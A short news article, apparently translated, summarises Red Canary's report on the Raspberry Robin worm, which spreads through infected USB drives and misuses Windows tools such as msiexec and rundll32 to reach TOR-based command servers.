Raspberry Robin is, alas, not the name of a new variety of raspberry, but that of a computer worm, i.e. malicious software using the network to reproduce itself on several devices, spotted by Red Canary for nearly nine months.
The main problem with Raspberry Robin is that it mainly spreads through compromised removable storage systems, such as USB drives. An ancestral method that is still just as effective.
A new worm has USB keys as its main host
Vigilance is, once again, in order. In effect, Red Canary claims to track a worm spreading through device-to-device removable file storage systems. And the challenge lies first of all in its ease of transmission, since it is very easy to connect a key to a computer without carrying out a preliminary antivirus scan, what is more in a climate of trust, for example at work.
Very insidious, this worm called Raspberry Robin uses and deceives Microsoft’s software installation and uninstallation engine, Windows Installer. The infection begins with a removable port containing a malicious file extension “.lnk”, which is normally used for shortcuts to perfectly legitimate files. The files downloaded from the USB key to the computer, including the malicious ones, are then executed by the victim via cmd.exe.
Finally, Windows Installer (msiexec.exe) will help, despite itself, the worm to reach control and command servers (known as C2). According to Red CanaryRaspberry Robin’s C2 framework employs TOR output nodes.
For the time being, it is difficult to understand the intentions behind this virus.
The end goal of the worm is to allow the creation of a malicious software library (DLL). The rundll32.exe executor engages the execution by the Windows utility, still in spite of itself, of the DLL, which favors, in fact, maintaining the malware on the infected device. This is the main track of the researchers of Red Canarybut as the investigation is still ongoing, this assumption may change.
The question also remains as to the purpose sought by the hackers behind this malware. Red Canary first detected this worm in September 2021 and finds that its presence has been increasing on many devices since January 2022. Fortunately, Red Canary already offers, on its site, several means of detecting this virus.
On the same subject :
Malware: infected emails show a 48.3% increase in the first quarter
Source : Red Canary
16